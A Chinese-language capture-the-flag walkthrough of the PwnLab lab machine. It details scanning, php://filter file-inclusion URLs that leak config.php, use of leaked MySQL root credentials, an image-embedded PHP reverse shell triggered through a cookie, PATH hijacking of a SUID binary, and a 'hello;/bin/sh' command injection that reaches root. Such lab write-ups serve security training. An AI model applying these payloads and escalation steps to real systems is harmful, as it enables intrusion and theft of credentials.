nmap扫描---->dirb扫描---->nikto扫描---->LFI读取config.php,获得数据库账号密码---->远程登录mysql找到网站用户账户---->上传图片马,通过LFI(cookie参数值)获得反弹shell---->修改$PATH配合suid得到mike的shell---->suid结合命令注入提权
环境信息攻击机ip:192.168.101.25
靶机ip:192.168.101.37
具体步骤 步骤1:nmap扫描sudo nmap -sS -A -p- 192.168.101.37扫描到80端口是Apache httpd,3306端口开放mysql,推测网站应该是apache+php+mysql的组合。
一个可能的思路是:既然3306端口对外开放,那么有可能需要远程连接mysql,也就是说,有可能需要找到mysql账号密码。
dirb http://192.168.101.37从扫描结果(index.php)可以确定网站服务端语言是php
访问 http://192.168.101.37/index.php ,提示上传图片。
从上图可见,网站主页上还有Login和Upload两个链接,点Login会出现登录框,点Upload会提示需要先登录。
根据dirb扫描结果,访问 http://192.168.101.37/images/,是包含一个.png文件的目录
访问 http://192.168.101.37/upload/,目前为空目录
nikto -host 192.168.101.37
扫描结果如上图所示,扫描结果中说http://192.168.101.37/config.php可能有数据库的ID和密码,访问一下这个页面试试。
页面上啥也没有,可能全是php代码
再访问一下 http://192.168.101.37/login.php 试试
和从主页点Login后显示的页面对比,发现表单长得很像
对比一下网页源代码,下面第一张图是直接访问 http://192.168.101.37/login.php ,第二张图是访问 http://192.168.101.37/?page=login ,可以看到表单部分的代码确实是完全一样的。
合理推断,page=后面的参数值可能就是php文件名,这边有可能存在文件包含的动作。
如果http://192.168.101.37/?page=处存在本地文件包含漏洞,则可以利用php://filter读取config.php的内容。根据nikto扫描结果,login.php和config.php位于相同目录下,因此可以构造如下url
http://192.168.101.37/?page=php://filter/convert.base64-encode/resource=config在浏览器中输入上述url,得到base64编码的config.php的内容
解码之后发现config.php的明文内容如下,数据库的用户名是root,密码是H4u%QJ_H99
步骤5: 远程登录mysql找到网站用户账户
用上一步中找到的账户密码(root : H4u%QJ_H99)远程登录靶机的mysql
mysql -h 192.168.101.37 -u root -p然后依次输入
MySQL [(none)]> show databases;
MySQL [(none)]> use Users;
MySQL [Users]> show tables;
MySQL [Users]> select * from users;得到网站的用户名和base64编码的密码
base64解码之后得到三个账户密码
kentJWzXuBJJNymikeSIfdsTEn6IkaneiSv5Ym2GRo
这三组账号密码都可以用于 http://192.168.101.37/?page=login 处的登录。
步骤6:尝试上传反弹shell并利用LFI执行随便用上个步骤中找到的一个账户登录网站,来到上传文件的页面 http://192.168.101.37/?page=upload
直接上传php文件显示上传失败,只允许上传图片。
上传图片马(jpg文件最后插入php反弹shell代码,反弹shell代码为linux自带的/usr/share/webshells/php/php-reverse-shell.php,注意替换$ip和$port),可以上传成功。
右键 复制图片地址,可以发现图片在upload文件夹下,且被重命名为5aa99052c87e783fa1ab9dc6b1cbaf44.jpg
由于http://192.168.101.37/?page=包含文件的时候,自动加上文件后缀.php,所以其实如果要用上传文件并利用本地文件包含来执行,还是需要最终文件后缀是.php。
用读取config.php文件内容的方法读取upload.php的内容。浏览器访问
http://192.168.101.37/?page=php://filter/convert.base64-encode/resource=uploadbase64解码后得到upload.php的内容如下,看不出来怎么才能使最终保存下来的文件后缀是.php
用读取config.php文件内容的方法读取index.php的内容。浏览器访问
http://192.168.101.37/?page=php://filter/convert.base64-encode/resource=indexbase64解码后得到index.php的内容如下。
注意到index.php有两处include,之前感知到的include第二处,而第一处include则是在cookie中设置了lang参数的情况下,include当前目录下lang文件夹下cookie中lang参数的值表示的文件。
PwnLab Intranet Image Hosting
![]()
[ Home ] [ Login ] [ Upload ]
攻击机上用nc监听2333端口
nc -nlvp 2333在火狐浏览器中用步骤5中找到的账户登录,hackbar中点Load URL,勾选Cookies,在cookie头中增加
;lang=../upload/5aa99052c87e783fa1ab9dc6b1cbaf44.jpg
使include函数能包含步骤6中上传的图片马。
最后点Execute,攻击机上nc监听的端口出现www-data用户的反弹shell
反弹shell中输入如下命令获得交互式shell
python -c 'import pty; pty.spawn("/bin/bash")'
反弹shell中进入/home目录,发现当前用户没有自己的home目录,但是另外4个用户有。4个用户中,john不知道哪儿来的,kane,kent和mike是老熟人,三位的网站账户密码在步骤5中已经泄露了。
用步骤5中的密码试试看可不可以用于系统登录,尝试之后发现kent和kane是可以登录的,mike无法登录,/home/kent下面什么有意思的东西都没有
切换到kane账号
su kane注意到/home/kane目录下有个可执行并且有suid的文件msgmike
执行一下试试。
执行过程中报错,执行cat命令时没找到/home/mike/msg.txt文件
这一下把我整不会了,进入知识盲区了,不知道接下来怎么办了。
看了vulnhub官方收录的walkthrough之后,才知道原来这里由于cat命令没有用绝对路径指定,所以可以创建一个名为cat的文件,实际内容是启动一个shell的命令,然后将该文件所在路径加到$PATH变量的最前面,使msgmike执行到调用cat的语句时执行该文件,从而启动mike用户的shell。
开始之前先看一下/etc/passwd文件,看看mike是哪种登录shell
cat /etc/passwd是/bin/bash
接下来依次输入如下三条命令,他们的含义依次是:
创建内容为/bin/bash,名为cat的文件
赋予cat文件执行权限
将cat文件所在目录/home/kane加入到$PATH变量中
kane@pwnlab:~$ echo "/bin/bash" > cat
kane@pwnlab:~$ chmod +x cat
kane@pwnlab:~$ export PATH=/home/kane:$PATH
此时 $PATH变量 如下
执行
kane@pwnlab:~$ ./msgmike得到mike的shell
/home/mike下也有一个有suid的可执行文件msg2root,属主是root,应该是用来提权的
尝试了几下,这个文件执行后会回显输入的参数,似乎是执行了echo命令
用strings命令观察一下msg2root的可读内容
mike@pwnlab:/home/mike$ strings msg2root
确实执行了echo命令,如果命令行输入的参数是没有经过处理直接拼接到echo命令后的,就可以利用命令注入来获得shell。
来试试在Message for root:提示符之后输入如下命令
hello;/bin/sh得到root的shell(这边用/bin/bash不行,暂时不知道原因)
在/root目录下找到flag.txt
